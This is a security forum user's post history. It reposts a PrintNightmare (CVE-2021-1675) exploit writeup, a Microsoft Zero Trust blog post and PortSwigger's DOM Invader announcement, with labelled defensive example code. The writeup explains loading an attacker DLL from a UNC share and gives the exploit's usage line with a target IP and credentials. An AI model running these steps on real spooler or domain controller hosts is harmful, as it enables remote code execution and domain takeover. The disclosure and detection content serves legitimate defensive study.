Everything posted by Nytro
-
Hi, have you tried talking to the people at Voxility? They might know what it's about and how to stop it. If not, you'll have to look at how that junk works, so you know what to stop and how; a few iptables rules should probably be enough, I don't expect it to be anything particularly sophisticated.
-
I'm not a hardware expert, but when I compared 2 processors I used this: https://cpu.userbenchmark.com/Compare/Intel-Core-i7-3610QM-vs-Intel-Core-i7-2600/2730vs620 and I took that "Speed rank" into account. But a real comparison is made on many aspects, and on a laptop more things matter than the processor.
-
My goal in this video is to make RSA as easy to understand (and perform) as possible. The math can get a little complicated, so I try to go step by step and explain every operation. If you have any questions, feel free to leave a comment and I'll get back to you as soon as I can. If you enjoyed the video, remember to like and share. If you want to see more content like this in the future, consider subscribing. Thanks for watching!
-
SonicWall & Fortinet MiTM (Man-in-the-Middle) credentials interceptor
Nytro replied to TheSecurityNerd's topic in Exploituri
Well, I think the code can be used for more than Fortinet and SonicWall; it looks pretty generic and easy to implement in a project.
-
PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service

Ten years ago, an escalation of privilege bug in Windows Printer Spooler was used in Stuxnet, a notorious worm that destroyed the nuclear enrichment centrifuges of Iran and infected more than 45,000 networks. In the past ten years, spooler has still had an endless stream of vulnerabilities disclosed, some of which are not known to the world; however, they are hidden bombs that could lead to disasters. Therefore, we have focused on spooler over the past months and reaped fruitfully.

The beginning of the research is PrintDemon, from which we got our inspiration. After digging into this bug deeper, we found a way to bypass the patch from MS. But just after MS released the new version, we immediately found a new way to exploit it again. After the story of PrintDemon, we realized that spooler is still a good attack surface, although security researchers have hunted for bugs in spooler for more than ten years. We started to explore the inner workings of Printer Spooler and discovered some 0-day bugs in it. Some of them are more powerful than PrintDemon and easier to exploit, and the others can be triggered remotely, which could lead to remote code execution.

CVE-2021-1675 is a remote code execution in Windows Print Spooler. According to the MSRC security bulletin, this vulnerability was reported by Zhipeng Huo, Piotr Madej and Zhang Yunhai. We also found this bug before and hoped to keep it secret to participate in Tianfu Cup ☹. As some people have already published an exploit video of CVE-2021-1675, here we publish our writeup and exploit for CVE-2021-1675. For more RCE and LPE vulnerabilities in Windows Spooler, please stay tuned and wait for our Blackhat talk 'Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer'.

RpcAddPrinterDriver

Adding a Printer Driver to a Server (RpcAddPrinterDriver). Let's check what MS-RPRN, the Print System Remote Protocol ([MS-RPRN] v20200826, release of August 26, 2020), says about the RpcAddPrinterDriver call:

To add or update a printer driver ("OEM Printer Driver") to a print server ("CORPSERV"), a client ("TESTCLT") performs the following steps. The client can use the RPC call RpcAddPrinterDriver to add a driver to the print server. The client ensures that the files for the printer driver are in a location accessible to the server. For that purpose, the client can share a local directory containing the files, or use [MS-SMB] to place the files into a directory on the server. The client then allocates and populates a DRIVER_INFO_2 structure as follows:

    pName = L"OEM Printer Driver";
    pEnvironment = L"Windows NT x86"; /* Environment the driver is compatible with */
    pDriverPath = "\\CORPSERV\C$\DRIVERSTAGING\OEMDRV.DLL";
    pDataFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMDATA.DLL";
    pConfigFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMUI.DLL";

The client allocates a DRIVER_CONTAINER driverContainer structure and initializes it to contain the DRIVER_INFO_2 structure. The client calls RpcAddPrinterDriver:

    RpcAddPrinterDriver( L"\\CORPSERV", &driverContainer );

CVE-2021-1675 Analysis

Clearly, if an attacker can bypass the authentication of RpcAddPrinterDriver, he could install a malicious driver on the print server. According to MSDN, the client needs SeLoadDriverPrivilege to call the RPC. However, this isn't true. Let's check the authentication logic here: ValidateObjectAccess is a normal security check for the Spooler Service. But in lines 19 and 20, argument a4 is user controllable. So a normal user can bypass the security check and add a driver. If you are in the domain, a normal domain user can connect to the Spooler service on the DC and install a driver into the DC. Then he can fully control the domain.

Exploit

But the real attack is not that simple. To exploit the authentication bypass bug, we need to understand what the Spooler service will do when you call RpcAddPrinterDriver. Suppose you supply these three paths to the service:

    pDataFile = A.dll
    pConfigFile = \\attackerip\Evil.dll
    pDriverPath = C.dll

It will copy A, B and C into the folder C:\Windows\System32\spool\drivers\x64\3\new. Then it will copy them to C:\Windows\System32\spool\drivers\x64\3, and load C:\Windows\System32\spool\drivers\x64\3\A.dll and C:\Windows\System32\spool\drivers\x64\3\C.dll into the Spooler service. However, in the latest version, Spooler checks to make sure that A and C are not UNC paths. But as B can be a UNC path, we can set pConfigFile to a UNC path (an evil DLL). This will make our evil DLL Evil.dll be copied to C:\Windows\System32\spool\drivers\x64\3\Evil.dll. Then call RpcAddPrinterDriver again, setting pDataFile to C:\Windows\System32\spool\drivers\x64\3\Evil.dll. It will load our evil DLL.

Unfortunately, it does not work: if you set A, B, C in the folder C:\Windows\System32\spool\drivers\x64\3, there will be an access conflict in the file copy. To bypass this, we need to use the backup feature of driver upgrade. If we upgrade some driver, the old version will be backed up into the C:\Windows\System32\spool\drivers\x64\3\old\1\ folder. Then we can bypass the access conflict and successfully inject our evil.dll into the spooler service.

Successfully loaded our dll: (screenshot)

Usage

    .\PrintNightmare.exe dc_ip path_to_exp user_name password

Example:

    .\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123##

Tested on Windows Server 2019 1809 17763.1518

Impact

This vulnerability can be used to achieve LPE and RCE. As for the RCE part, you need a user authenticated on the Spooler service. However, this is still critical in a domain environment: because normally a DC will have the Spooler service enabled, a compromised domain user may use this vulnerability to control the DC.

There are more hidden bombs in Spooler which are not publicly known. We will share more RCE and LPE vulnerabilities in Windows Spooler; please stay tuned and wait for our Blackhat talk 'Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer'.

Credit: Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)

Source: https://github.com/afwu/PrintNightmare
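From the defender's side, the writeup gives two concrete things to look for in a driver-add request: a UNC path in one of the DRIVER_INFO_2 fields (the spooler only rejects it for pDriverPath and pDataFile, not pConfigFile), and a data or driver file that already sits inside the spooler's own driver store, which is how the copied DLL gets re-registered. The Node.js snippet below is an added triage example, not code from the writeup or the PrintNightmare repository; the record shape, the field names, the targetIsDomainController flag and all sample values (including the 192.0.2.10 host) are constructed for it.

```javascript
// Added example (not from the writeup or the PrintNightmare repository):
// triage RpcAddPrinterDriver-style requests by the three DRIVER_INFO_2 paths,
// flagging the two conditions the writeup relies on. Record shape, field
// names and sample values are constructed for this example.

// Everything under the spooler's driver store, including the old\1 backups.
const SPOOL_DRIVER_STORE = /^c:\\windows\\system32\\spool\\drivers\\/i;

// A UNC path: two leading backslashes, a host name, then a share or file.
function isUncPath(p) {
  return /^\\\\[^\\]+\\/.test(p);
}

// Returns { severity, findings } for one driver-add request.
function triageDriverAdd(record) {
  const findings = [];
  for (const field of ['pDriverPath', 'pDataFile', 'pConfigFile']) {
    const value = record[field] || '';
    if (isUncPath(value)) {
      // The writeup notes the spooler rejects UNC paths for pDriverPath and
      // pDataFile but not for pConfigFile, so any UNC source is worth review.
      findings.push(`${field} is a UNC path: ${value}`);
    }
    if (SPOOL_DRIVER_STORE.test(value)) {
      // A file already inside the driver store is being re-registered, the
      // second stage the writeup describes.
      findings.push(`${field} points into the spooler driver store: ${value}`);
    }
  }
  // The writeup's high-impact case is a domain controller whose spooler is
  // reachable by ordinary domain users; escalate there.
  let severity = 'info';
  if (findings.length > 0) {
    severity = record.targetIsDomainController ? 'critical' : 'high';
  }
  return { severity, findings };
}

// Constructed sample requests: a plain local install, then the two stages
// from the writeup (UNC config file, then the copied file re-used).
const SAMPLE_REQUESTS = [
  { client: 'TESTCLT', targetIsDomainController: false,
    pDriverPath: 'C:\\DriverStaging\\OEMDRV.DLL',
    pDataFile: 'C:\\DriverStaging\\OEMDATA.DLL',
    pConfigFile: 'C:\\DriverStaging\\OEMUI.DLL' },
  { client: 'user2', targetIsDomainController: true,
    pDriverPath: 'C:\\DriverStaging\\C.dll',
    pDataFile: 'C:\\DriverStaging\\A.dll',
    pConfigFile: '\\\\192.0.2.10\\share\\Evil.dll' },  // placeholder host
  { client: 'user2', targetIsDomainController: true,
    pDriverPath: 'C:\\DriverStaging\\C.dll',
    pDataFile: 'C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Evil.dll',
    pConfigFile: 'C:\\DriverStaging\\OEMUI.DLL' },
];

function triageAll(requests = SAMPLE_REQUESTS) {
  return requests.map(triageDriverAdd);
}

for (const result of triageAll()) console.log(JSON.stringify(result));
```

The first request produces no findings, the second is flagged for the UNC pConfigFile, and the third for a pDataFile that already lives in the driver store; both of the latter are rated critical because the constructed target is a domain controller. Note that the MS-RPRN example itself stages files on a UNC share, so a UNC finding on its own is a review prompt, not proof of abuse.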
-
The new trend: https://twitter.com/hashtag/InfoSecBikini?src=hashtag_click
-
June 30, 2021
The critical role of Zero Trust in securing our world
Vasu Jakkal, Corporate Vice President, Security, Compliance and Identity

We are operating in the most complex cybersecurity landscape that we’ve ever seen. While our current ability to detect and respond to attacks has matured incredibly quickly in recent years, bad actors haven’t been standing still. Large-scale attacks like those pursued by Nobelium[1] and Hafnium, alongside ransomware attacks on critical infrastructure, indicate that attackers have become increasingly sophisticated and coordinated. It is abundantly clear that the work of cybersecurity and IT departments is critical to our national and global security.

Microsoft has a unique level of access to data on cyber threats and attacks globally, and we are committed to sharing this information and insights for the greater good. As illustrated by recent attacks, we collaborate across the public and private sectors, as well as with our industry peers and partners, to create a stronger, more intelligent cybersecurity community for the protection of all. This collaborative relationship includes the United States government, and we celebrate the fast-approaching milestones of the US Cybersecurity Executive Order[2] (EO). The EO specifies concrete actions to strengthen national cybersecurity and address increasingly sophisticated threats across federal agencies and the entire digital ecosystem. This order directs agencies and their suppliers to improve capabilities and coordination on information sharing, incident detection, incident response, software supply chain security, and IT modernization, which we support wholeheartedly. With these national actions set in motion and a call for all businesses to enhance cybersecurity postures, Microsoft and our extensive partner ecosystem stand ready to help protect our world.
The modern framework for protecting critical infrastructure, minimizing future incidents, and creating a safer world already exists: Zero Trust. We have helped many public and private organizations to establish and implement a Zero Trust approach, especially in the wake of the remote and hybrid work tidal wave of 2020-2021. And Microsoft remains committed to delivering comprehensive, integrated security solutions at scale and supporting customers on every step of their security journey, including detailed guidance for Zero Trust deployment.

Zero Trust’s critical role in helping secure our world

The evidence is clear—the old security paradigm of building an impenetrable fortress around your resources and data is simply not viable against today’s challenges. Remote and hybrid work realities mean people move fluidly between work and personal lives, across multiple devices, and with increased collaboration both inside and outside of organizational boundaries. Entry points for attacks—identities, devices, apps, networks, infrastructure, and data—live outside the protections of traditional perimeters. The modern digital estate is distributed, diverse, and complex. This new reality requires a Zero Trust approach.

Section 3 of the EO calls for “decisive steps” for the federal government “to modernize its approach to cybersecurity” by accelerating the move to secure cloud services and Zero Trust implementation, including a mandate of multifactor authentication and end-to-end encryption of data. We applaud this recognition of the Zero Trust strategy as a cybersecurity best practice, as well as the White House encouragement of the private sector to take “ambitious measures” in the same direction as the EO guidelines. Per Section 3, federal standards and guidance for Zero Trust are developed by the National Institute of Standards and Technology (NIST) of the US Department of Commerce, similar to other industry and scientific innovation measurements.
NIST has defined Zero Trust in terms of several basic tenets:
- All resource authentication and authorization are dynamic and strictly enforced before access is allowed.
- Access to trust in the requester is evaluated before the access is granted.
- Access should also be granted with the least privileges needed to complete the task.
- Assets should always act as if an attacker is present on the enterprise network.

At Microsoft, we have distilled these Zero Trust tenets into three principles: verify explicitly, use least privileged access, and assume breach. We use these principles for our strategic guidance to customers, software development, and global security posture. Organizations that operate with a Zero Trust mentality are more resilient, consistent, and responsive to new attacks. A true end-to-end Zero Trust strategy not only makes it harder for attackers to get into the network but also minimizes potential blast radius by preventing lateral movement.

While preventing bad actors from gaining access is critical, it’s only part of the Zero Trust equation. Being able to detect a sophisticated actor inside your environment is key to minimizing the impact of a breach. Sophisticated threat intelligence and analytics are critical for a rapid assessment of an attacker’s behavior, eviction, and remediation.

Resources for strengthening national security in the public and private sectors

We believe President Biden’s EO is a timely call-to-action, not only for government agencies but as a model for all businesses looking to become resilient in the face of cyber threats. The heightened focus on incident response, data handling, collaboration, and implementation of Zero Trust should be a call-to-action for every organization—public and private—in the mission to better secure our global supply chain, infrastructure resources, information, and progress towards a better future.
Microsoft is committed to supporting federal agencies in answering the nation’s call to strengthen inter- and intra-agency capabilities, unlocking the government’s full cyber capabilities. Recommended next steps for federal agencies have been outlined by my colleague Jason Payne, Chief Technology Officer of Microsoft Federal. As part of this responsibility, we have provided Federal agencies with key Zero Trust Scenario Architectures mapped to NIST standards, as well as a Zero Trust Rapid Modernization Plan.

Microsoft is also committed to supporting customers in staying up to date with the latest security trends and developing the next generation of security professionals. We have developed a set of skilling resources to train teams on the capabilities identified in the EO and be ready to build a more secure, agile environment that supports every mission.

In addition to EO resources for federal government agencies, we are continuing to publish guidance, share learnings, develop resources, and invest in new capabilities to help organizations accelerate their Zero Trust adoption and meet their cybersecurity requirements. Here are our top recommended Zero Trust resources:
- For details on how Microsoft defines Zero Trust and breaks down solutions across identities, endpoints, apps, networks, infrastructure, and data, download the Zero Trust Maturity Model.
- To assess your organization’s progress in the Zero Trust journey and receive suggestions for technical next steps, use our Zero Trust Assessment tool.
- For technical guidance on deployment, integration, and development, visit our Zero Trust Guidance Center for step-by-step guidance on implementing Zero Trust principles.
- If you’d like to learn from our own Zero Trust deployment journey at Microsoft, our Chief Information Security Officer Bret Arsenault and team share their stories at Microsoft Digital Inside Track.
Tackling sophisticated cyber threats together

The EO is an opportunity for all organizations to improve cybersecurity postures and act rapidly to implement Zero Trust, including multifactor authentication and end-to-end encryption. The White House has provided clear direction on what is required, and the Zero Trust framework can also be used as a model for private sector businesses, state and local governments, and organizations around the world. We can only win as a team against these malicious attackers and significant challenges. Every step your organization takes in advancing a Zero Trust architecture not only secures your assets but also contributes to a safer world for all. We applaud organizations of every size for embracing Zero Trust, and we stand committed to partnering with you all on this journey.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

[1] Nobelium Resource Center, Microsoft Security Response Center. 04 March 2021.
[2] President Signs Executive Order Charting New Course to Improve the Nation’s Cybersecurity and Protect Federal Government Networks, The White House, 12 May 2021.

Source: https://www.microsoft.com/security/blog/2021/06/30/the-critical-role-of-zero-trust-in-securing-our-world/
-
Introducing DOM Invader: DOM XSS just got a whole lot easier to find
Gareth Heyes | 30 June 2021 at 16:47 UTC
XSS DOM Hacking Tools

Of the three main types of XSS, DOM-based XSS is by far the most difficult to find and exploit. But we come bearing good news! PortSwigger just released a new tool for Burp Suite Professional and Burp Suite Community Edition that's going to make testing for DOM XSS much easier - and we think you're going to like it. Meet: DOM Invader.

We've created a YouTube video to show you how to use DOM Invader and solve an Academy lab.

Background

Most modern sites use multiple JavaScript libraries - and have many lines of complex, minified code. This makes testing for DOM XSS a real headache. PortSwigger Research has specifically developed DOM Invader to make this process much easier.

"The Augmented DOM allows you to find DOM XSS as if it were reflected XSS."

Through its Augmented DOM, DOM Invader will provide you with a convenient tree view of all of your target's sources and sinks. This greatly simplifies the task of hunting for DOM XSS, and will be big news for the bug bounty hunting and pentest communities. So, without further ado, let's take a closer look at DOM Invader and what it can do.

[Image: DOM Invader's Augmented DOM provides a convenient tree view of an application's sources and sinks.]

How to get started with DOM Invader

DOM Invader is a completely new Burp Suite tool, implemented as an extension in the embedded browser. Simply update your version of Burp Suite Professional or Burp Suite Community Edition to 2021.7 on the Early Adopter channel to start using it. View the latest release notes.

By default, DOM Invader is turned off (because it alters site behavior). Turn it on by clicking the icon in the top right hand corner of Burp Suite's embedded browser.

[Image: DOM Invader lives in Burp Suite's embedded browser.]
DOM Invader instruments your target's DOM, intercepting any JavaScript sources and sinks it might come across, and organizing them ready for you to play with. A "source" could be any JavaScript object that allows user-controlled input (for example: location.search), while a "sink" is any function or setter that allows JavaScript/HTML execution. One notorious example of a sink is the eval function.

"Helpfully, DOM Invader orders sinks so that the most interesting ones appear first."

With DOM Invader, we're going to be working a lot with canaries. A canary is a unique string that's used to see where your user input is reflected inside a sink. By default, DOM Invader uses a random canary, but you can customize this value to whatever you like.

How DOM Invader works

We're not going to go into a full demo of how to use DOM Invader here (please see the documentation for that), but as a broad overview, you're going to be spending a lot of your time using the tool in the Augmented DOM. The Augmented DOM will show you all the sources and sinks contained within your target, and allows you to find DOM XSS as if it were reflected XSS - by inspecting the value sent to the sink.

Essentially, you'll load up the site you want to test, and insert your canary into a query parameter or other such source. Opening DevTools in Burp Suite's embedded browser, you'll be able to click on a new "Augmented DOM" tab - which will show you any sources and sinks containing the canary value - as well as a tree view of all the sources and sinks available. Helpfully, DOM Invader orders sinks so that the most interesting ones appear first.

[Image: DOM Invader will order lists of sinks with the most interesting ones appearing first.]

When you find an interesting sink, DOM Invader will allow you to see the value contained in it, as well as a stack trace. It'll even highlight your canary for you. At this point, you might like to add some extra characters to your canary in the URL parameter or another source.
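To make the source/sink/canary mechanics concrete, here is an added Node.js example in the spirit of what the post describes; it is not DOM Invader's code. Instrumented sinks report the value they receive to a monitor, which checks for the canary, records which follow-up characters survived unencoded right after it, and orders findings by sink rank (lower is more interesting, as in the post). The ranking subset is taken from the post's own list; the element stand-ins, the escapeHtml helper and the sample page logic are constructed so the example runs without a browser.

```javascript
// Added example, not DOM Invader's code: a small sink monitor in the style
// the post describes. Instrumented sinks report the value they receive; the
// monitor checks for the canary, records which follow-up characters reached
// the sink unencoded, and orders findings by sink rank (lower = more
// interesting). Ranking subset from the post; element stand-ins and sample
// values are constructed for this example.

const SINK_RANKING = {
  'eval': 2, 'document.write': 15, 'element.innerHTML': 21,
  'location.href': 25, 'element.textContent': 74,
};
// Characters whose survival in a sink changes what can be done with it.
const PROBE_CHARS = ['<', '>', '"', "'", '/'];

function createSinkMonitor(canary) {
  const findings = [];

  // Every instrumented sink calls this with the value it was given.
  function record(sink, target, value) {
    const text = String(value);
    if (!text.includes(canary)) return false;
    // A probe character counts as unencoded if it still follows the canary as-is.
    const unencoded = PROBE_CHARS.filter(c => text.includes(canary + c));
    findings.push({ sink, target, rank: SINK_RANKING[sink] ?? 999,
                    value: text, unencoded, stack: new Error().stack });
    return true;
  }

  // One row per sink/target with probe results merged, most interesting first.
  function summary() {
    const rows = new Map();
    for (const f of findings) {
      const key = `${f.sink}@${f.target}`;
      const row = rows.get(key) ||
        { sink: f.sink, target: f.target, rank: f.rank, unencoded: new Set() };
      f.unencoded.forEach(c => row.unencoded.add(c));
      rows.set(key, row);
    }
    return [...rows.values()]
      .map(r => ({ ...r, unencoded: PROBE_CHARS.filter(c => r.unencoded.has(c)) }))
      .sort((a, b) => a.rank - b.rank);
  }
  return { record, summary, findings };
}

// Wrap a sink function so each call is reported before the original runs.
function hookSink(monitor, sink, target, original) {
  return function (...args) {
    monitor.record(sink, target, args[0]);
    return original.apply(this, args);
  };
}

// Stand-in for a DOM element with an instrumented innerHTML setter, so the
// example runs in Node; in a browser one would wrap Element.prototype.innerHTML.
function fakeElement(monitor, id) {
  const el = { id, html: '' };
  Object.defineProperty(el, 'innerHTML', {
    set(v) { monitor.record('element.innerHTML', id, v); el.html = v; },
    get() { return el.html; },
  });
  return el;
}

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Walkthrough: canary plus one probe character goes through a simulated
// query-parameter source, once per character, like a follow-up would.
function runDemo(canary = 'zzcanary') {
  const monitor = createSinkMonitor(canary);
  const rawBanner = fakeElement(monitor, 'banner');   // page forgets to encode
  const safeBanner = fakeElement(monitor, 'safe');    // page encodes first
  const hookedEval = hookSink(monitor, 'eval', 'page', globalThis.eval);

  for (const c of PROBE_CHARS) {
    const param = decodeURIComponent(encodeURIComponent(canary + c)); // ?q=...
    rawBanner.innerHTML = 'Hello, ' + param + '!';
    safeBanner.innerHTML = 'Hello, ' + escapeHtml(param) + '!';
    hookedEval('var greeting = ' + JSON.stringify(param) + ';');
  }
  return monitor.summary();
}

for (const row of runDemo()) console.log(row.sink, row.target, row.rank, row.unencoded);
```

The summary lists the eval sink first (rank 2) with everything but the double quote unencoded, because JSON.stringify escapes only the quote; the unencoded banner (rank 21) lets all five characters through; the encoded banner keeps only the slash, which HTML encoding does not need to touch. That is the same "add extra characters, then inspect the value in the sink" loop the post describes, reduced to code.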
You can then check the canary value in the Augmented DOM to see if those characters have been correctly encoded.

[Image: Canaries are automatically highlighted by DOM Invader.]

Other useful features include the ability to search values sent to a sink, as well as automatically injecting canaries into URL parameters and form elements. View the full documentation for DOM Invader.

Web messages in DOM Invader

When testing sites, we've always found it cumbersome to test for web-message vulnerabilities. Sure, you can add event listeners and breakpoints in Chrome - but there's no easy way to edit them without going to the effort of writing some JavaScript code. PortSwigger could hardly let this situation stand! So DOM Invader is set up to help you test for web-message vulnerabilities.

"DOM Invader is capable of manipulating web messages and spoofing their origin automatically, if you so wish."

[Image: DOM Invader lets you see web messages and easily reissue them in its Postmessage tab.]

Again, we won't go into full details here (please see the documentation for that), but to access this functionality, just click on DOM Invader's icon in the embedded browser, and turn on "Postmessage interception". Through the Postmessage tab, you'll be able to see a bunch of useful information about any web messages your target sends. This includes their type (e.g. JSON string/JavaScript object), origin, actual data sent, and the location in the code where they occur (the Stack Trace). You can then click through to open a web message, where you can manipulate the data sent. You can also have DOM Invader spoof the origin of a web message, simply by clicking the "Spoof origin" check box. Pretty cool, right?

If you find a vulnerable event listener and you've successfully crafted an exploit in the data box, then you can generate a proof of concept at the touch of a button. Simply click the "Build PoC" button, and your PoC will be copied to the clipboard.

[Image: DOM Invader is capable of manipulating web messages and spoofing their origin automatically, if you so wish.]

DOM Invader also attempts to grade the severity and confidence of messages it sees based on several factors - including if the message data was found in a sink and what type of sink it was. When messages are manipulated, DOM Invader will attempt to do a follow up with more interesting characters. If this is successful it will upgrade the severity and confidence based on the follow up characters that were found unencoded in the sink.

List of sources and sinks

Whilst developing DOM Invader we quite naturally needed a list of sources and sinks, so we decided to produce one and put it into DOM Invader. We decided to release this list and terminology as it was trivial to extract from the source anyway. This will be included in the XSS cheat sheet when it's updated - but for now the current list will be added to this post. We use the sink ranking terminology in order to decide which sink is more important than others. The lower the value, the more important the sink is.
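The web-message grading described above (severity from the sink the data reached, confidence raised when a follow-up with interesting characters arrives unencoded) is easy to misread without an example, so here is an added Node.js simulation; it is not DOM Invader's code and its grading scale is an assumption. It puts a listener that passes event.data straight into an HTML sink next to one that checks event.origin against an allow-list and only accepts a structured message, then grades what each let through. MessageEvent objects, origins and the sink log are all constructed stand-ins for the browser objects.

```javascript
// Added example, not DOM Invader's code: a simulated postMessage exchange
// with a vulnerable and a hardened listener, plus a grader that rates each
// message the way the post describes. Events, origins, sink log and the
// severity scale are constructed for this example.

const SINK_SEVERITY = { 'element.innerHTML': 'high', 'eval': 'high',
                        'location.href': 'medium', 'element.textContent': 'low' };
const SEVERITY_ORDER = ['high', 'medium', 'low'];

// Minimal stand-in for the MessageEvent a postMessage listener receives.
function messageEvent(origin, data) { return { origin, data }; }

// Records every value that reaches a sink, so it can be searched afterwards.
function makeSinkLog() {
  const log = [];
  return { log, reach(sink, value) { log.push({ sink, value: String(value) }); } };
}

// Vulnerable: no origin check, message data concatenated into an HTML sink.
function vulnerableListener(sinks) {
  return event => { sinks.reach('element.innerHTML', '<p>' + event.data + '</p>'); return true; };
}

// Hardened: allow-listed origin, expected message shape, text-only sink.
function hardenedListener(sinks, allowedOrigins) {
  return event => {
    if (!allowedOrigins.includes(event.origin)) return false;
    if (typeof event.data !== 'object' || event.data === null) return false;
    if (typeof event.data.title !== 'string') return false;
    sinks.reach('element.textContent', event.data.title);
    return true;
  };
}

// The "more interesting characters" appended in the follow-up message.
const FOLLOW_UP = '<">';

// Grade one message marker: did it reach a sink, which one, and did the
// follow-up characters survive unencoded?
function gradeMessage(sinks, marker) {
  const hits = sinks.log.filter(e => e.value.includes(marker));
  if (hits.length === 0) return { severity: 'info', confidence: 'tentative', sinks: [] };
  const worst = hits.map(h => SINK_SEVERITY[h.sink] ?? 'low')
    .sort((a, b) => SEVERITY_ORDER.indexOf(a) - SEVERITY_ORDER.indexOf(b))[0];
  const unencoded = hits.some(h => h.value.includes(marker + FOLLOW_UP));
  return { severity: worst, confidence: unencoded ? 'firm' : 'tentative',
           sinks: hits.map(h => h.sink) };
}

function runDemo() {
  const marker = 'dominv';
  // Vulnerable page: a message from a spoofed origin lands in innerHTML,
  // and the follow-up characters arrive unencoded.
  const vulnSinks = makeSinkLog();
  const vuln = vulnerableListener(vulnSinks);
  vuln(messageEvent('https://evil.example', marker));
  vuln(messageEvent('https://evil.example', marker + FOLLOW_UP));
  // Hardened page: the spoofed origin is dropped; a trusted one reaches a
  // text sink only, so even unencoded characters rate low severity.
  const hardSinks = makeSinkLog();
  const hard = hardenedListener(hardSinks, ['https://trusted.example']);
  const droppedSpoof = hard(messageEvent('https://evil.example', { title: marker }));
  const accepted = hard(messageEvent('https://trusted.example', { title: marker + FOLLOW_UP }));
  return { vulnerable: gradeMessage(vulnSinks, marker),
           hardened: gradeMessage(hardSinks, marker), droppedSpoof, accepted };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

The vulnerable listener grades high/firm: the data reached innerHTML and the follow-up characters were found unencoded. The hardened listener rejects the spoofed origin outright, and the message it does accept only reaches textContent, so it grades low even though the characters survive; that is the difference between "attacker-controlled data is present" and "attacker-controlled data is interpreted as HTML".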
Sources

    const sourcesList = [
        "location", "location.href", "location.hash", "location.search", "location.pathname",
        "document.URL", "window.name", "document.referrer", "document.documentURI",
        "document.baseURI", "document.cookie"
    ];

Sinks

    const sinkRanking = {
        "jQuery.globalEval": 1, "eval": 2, "Function": 3, "execScript": 4,
        "setTimeout": 5, "setInterval": 6, "setImmediate": 7, "msSetImmediate": 7,
        "script.src": 8, "script.textContent": 9, "script.text": 10, "script.innerText": 11,
        "script.innerHTML": 12, "script.appendChild": 13, "script.append": 14,
        "document.write": 15, "document.writeln": 16,
        "jQuery": 17, "jQuery.$": 18, "jQuery.constructor": 19,
        "jQuery.parseHTML": 20, "jQuery.has": 20, "jQuery.init": 20, "jQuery.index": 20,
        "jQuery.add": 20, "jQuery.append": 20, "jQuery.appendTo": 20, "jQuery.after": 20,
        "jQuery.insertAfter": 20, "jQuery.before": 20, "jQuery.insertBefore": 20,
        "jQuery.html": 20, "jQuery.prepend": 20, "jQuery.prependTo": 20,
        "jQuery.replaceWith": 20, "jQuery.replaceAll": 20, "jQuery.wrap": 20,
        "jQuery.wrapAll": 20, "jQuery.wrapInner": 20,
        "jQuery.prop.innerHTML": 20, "jQuery.prop.outerHTML": 20,
        "element.innerHTML": 21, "element.outerHTML": 22, "element.insertAdjacentHTML": 23,
        "iframe.srcdoc": 24,
        "location.href": 25, "location.replace": 26, "location.assign": 27, "location": 28,
        "window.open": 29, "iframe.src": 30, "javascriptURL": 31,
        "jQuery.attr.onclick": 32, "jQuery.attr.onmouseover": 32, "jQuery.attr.onmousedown": 32,
        "jQuery.attr.onmouseup": 32, "jQuery.attr.onkeydown": 32, "jQuery.attr.onkeypress": 32,
        "jQuery.attr.onkeyup": 32,
        "element.setAttribute.onclick": 33, "element.setAttribute.onmouseover": 33,
        "element.setAttribute.onmousedown": 33, "element.setAttribute.onmouseup": 33,
        "element.setAttribute.onkeydown": 33, "element.setAttribute.onkeypress": 33,
        "element.setAttribute.onkeyup": 33,
        "createContextualFragment": 34, "document.implementation.createHTMLDocument": 35,
        "xhr.open": 36, "xhr.send": 36, "fetch": 36, "fetch.body": 36,
        "xhr.setRequestHeader.name": 37, "xhr.setRequestHeader.value": 38,
        "jQuery.attr.href": 39, "jQuery.attr.src": 40, "jQuery.attr.data": 41,
        "jQuery.attr.action": 42, "jQuery.attr.formaction": 43,
        "jQuery.prop.href": 44, "jQuery.prop.src": 45, "jQuery.prop.data": 46,
        "jQuery.prop.action": 47, "jQuery.prop.formaction": 48,
        "form.action": 49, "input.formaction": 50, "button.formaction": 51, "button.value": 52,
        "element.setAttribute.href": 53, "element.setAttribute.src": 54,
        "element.setAttribute.data": 55, "element.setAttribute.action": 56,
        "element.setAttribute.formaction": 57,
        "webdatabase.executeSql": 58, "document.domain": 59,
        "history.pushState": 60, "history.replaceState": 61,
        "xhr.setRequestHeader": 62, "websocket": 63,
        "anchor.href": 64, "anchor.target": 65, "JSON.parse": 66, "document.cookie": 67,
        "localStorage.setItem.name": 68, "localStorage.setItem.value": 69,
        "sessionStorage.setItem.name": 70, "sessionStorage.setItem.value": 71,
        "element.outerText": 72, "element.innerText": 73, "element.textContent": 74,
        "element.style.cssText": 75, "RegExp": 76, "window.name": 77,
        "location.pathname": 78, "location.protocol": 79, "location.host": 80,
        "location.hostname": 81, "location.hash": 82, "location.search": 83,
        "input.value": 84, "input.type": 85, "document.evaluate": 86
    };

Team effort

I temporarily joined the PortSwigger Scanner team whilst developing this tool and I worked with so many talented people. It was a real team effort to produce the final product. I'd like to thank James Kettle for coming up with the idea to create an extension and for helping with the initial design. James was inspired by Filedescriptor's (Cure53) similar tool. I did some refactoring with Patrick Albinson and he proved he is a Gradle god when helping get DOM Invader into Burp. Alex Craig was heavily involved in refactoring and improving DOM Invader so much and made quite brilliant suggestions to move it lightyears ahead of the initial prototype.
Paul Wilshaw improved the UI tremendously and made everything look pretty, especially the Postmessage features. Thanks to Nolan Ward for doing the video editing and creating the fantastic animation. Thanks to Matt Atkinson for helping with the copy editing and Nigel Evans for doing a great job with the documentation. Chris Wood really helped organizing UI sessions, and finally I'd like to thank James Kettle, Michael Stepankin, Andrzej Matykiewicz and Trikster for being guinea pigs and UX testing the tool.

Eating our own dog food

